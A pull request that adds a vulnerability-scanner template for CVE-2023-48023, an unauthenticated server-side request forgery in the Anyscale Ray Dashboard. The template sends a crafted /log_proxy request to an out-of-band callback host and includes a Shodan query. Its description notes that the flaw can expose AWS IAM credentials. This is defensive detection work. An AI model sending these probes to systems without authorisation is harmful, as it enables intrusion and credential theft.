### PR TITLE
Added CVE-2023-48023 template

### DIFF
--- a/http/cves/2023/CVE-2023-48023.yaml
+++ b/http/cves/2023/CVE-2023-48023.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-48023
 
 info:
-  name: Anyscale Ray 2.6.3 and 2.8.0 - Unauthenticated SSRF via log_proxy
+  name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
   author: cookiehanhoan,harryha
   severity: high
   description: |
@@ -10,18 +10,18 @@ info:
     The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
   remediation: Update to the latest version
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
     - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
     - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
     - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
     cve-id: CVE-2023-48023
     cwe-id: CWE-441,CWE-918
   metadata:
-    verified: true
     max-request: 1
+    verified: true
     vendor: Anyscale
     shodan-query: http.favicon.hash:463802404
   tags: cve,cve2023,ssrf,ray,anyscale
@@ -31,8 +31,14 @@ http:
     path:
       - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"
 
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol
         words:
           - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "<h1> Interactsh Server </h1>"

--- a/http/cves/2023/CVE-2023-48023.yaml
+++ b/http/cves/2023/CVE-2023-48023.yaml
@@ -1,0 +1,38 @@
+id: CVE-2023-48023
+
+info:
+  name: Anyscale Ray 2.6.3 and 2.8.0 - Unauthenticated SSRF via log_proxy
+  author: cookiehanhoan,harryha
+  severity: high
+  description: |
+    The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
+  impact: |
+    The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
+  remediation: Update to the latest version
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
+    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
+    - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
+    - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2023-48023
+    cwe-id: CWE-441,CWE-918
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: Anyscale
+    shodan-query: http.favicon.hash:463802404
+  tags: cve,cve2023,ssrf,ray,anyscale
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"


### PR DESCRIPTION
### New template for CVE-2023-48023 in Anyscale Ray Dashboard

This template is designed to detect a Server-Side Request Forgery (SSRF) vulnerability in Anyscale Ray 2.6.3 and 2.8.0 - Unauthenticated SSRF via log_proxy, identified as CVE-2023-48023.

The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API.

- **Added new template for CVE-2023-48023**

- **References**:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
    - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054


### Template Validation

The template for CVE-2023-48023 has been successfully validated locally.